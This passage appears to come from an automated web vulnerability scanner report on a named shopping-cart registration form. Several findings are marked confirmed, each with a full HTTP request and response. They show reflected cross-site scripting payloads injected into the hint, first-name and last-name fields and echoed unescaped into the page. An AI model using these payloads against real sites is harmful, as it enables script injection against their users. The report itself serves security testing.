</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST '"--></style></script><script>alert(0x000229)</script>
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000229)%3c%2fscript%3e&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:29 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x000229)</script>">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST '"--></style></script><script>alert(0x00022A)</script>
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 343
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00022A)%3c%2fscript%3e&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:32 GMT
Content-Length: 12073
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x00022A)</script>"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST '"--></style></script><script>alert(0x00022B)</script>
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 343
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00022B)%3c%2fscript%3e&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:35 GMT
Content-Length: 12073
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

